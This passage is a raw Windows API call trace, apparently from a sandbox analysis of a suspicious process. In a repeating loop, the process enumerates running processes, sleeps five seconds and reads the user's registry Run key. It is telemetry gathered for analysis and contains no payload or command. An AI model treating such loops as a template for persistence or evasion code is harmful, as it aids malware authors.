[0177.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.337] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.337] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.338] NtClose (Handle=0x274) returned 0x0 [0177.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.353] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.357] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.358] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.358] NtClose (Handle=0x274) returned 0x0 [0177.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.370] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.371] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.372] NtClose (Handle=0x274) returned 0x0 [0177.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.392] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.392] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.392] NtClose (Handle=0x274) returned 0x0 [0177.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.408] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.409] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.410] NtClose (Handle=0x274) returned 0x0 [0177.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.424] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.425] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.425] NtClose (Handle=0x274) returned 0x0 [0177.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.444] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.445] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.445] NtClose (Handle=0x274) returned 0x0 [0177.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.505] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.509] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.511] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.511] NtClose (Handle=0x274) returned 0x0 [0177.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.540] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.541] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.541] NtClose (Handle=0x274) returned 0x0 [0177.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.555] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.555] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.555] NtClose (Handle=0x274) returned 0x0 [0177.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.570] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.572] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.572] NtClose (Handle=0x274) returned 0x0 [0177.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.593] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.595] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.595] NtClose (Handle=0x274) returned 0x0 [0177.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.608] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.609] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.609] NtClose (Handle=0x274) returned 0x0 [0177.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.627] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 